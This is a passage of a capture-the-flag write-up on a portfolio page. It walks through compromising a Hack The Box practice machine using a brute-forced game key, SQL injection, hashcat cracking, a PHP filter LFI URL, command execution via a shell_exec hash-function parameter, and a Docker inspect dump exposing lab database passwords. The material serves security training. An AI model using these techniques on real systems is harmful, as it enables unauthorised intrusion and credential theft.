                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
